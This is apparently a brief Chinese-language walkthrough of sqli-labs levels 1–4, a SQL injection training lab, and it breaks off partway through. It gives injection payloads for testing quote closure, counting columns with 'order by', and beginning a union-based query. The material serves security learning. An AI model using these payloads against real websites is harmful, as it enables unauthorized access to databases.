sqli-labs闖關1~4

LESS–1(錯誤型GET單引號字符型注入) 1.測試閉合符號; 輸入 ?id=1 界面正常,輸入?id=1’ 界面報錯,那麼就存在sql注入漏洞。 2.判斷列數; 輸入 ?id=1’ order by 3 --+ 顯示正常 輸入 ?id=1’ order by 4 --+ 報錯了,如下圖: 所以得出這個表列數有3個。 3.聯合查詢爆數據庫 union注入開始: ?id=-1’ union sel
相關文章
相關標籤/搜索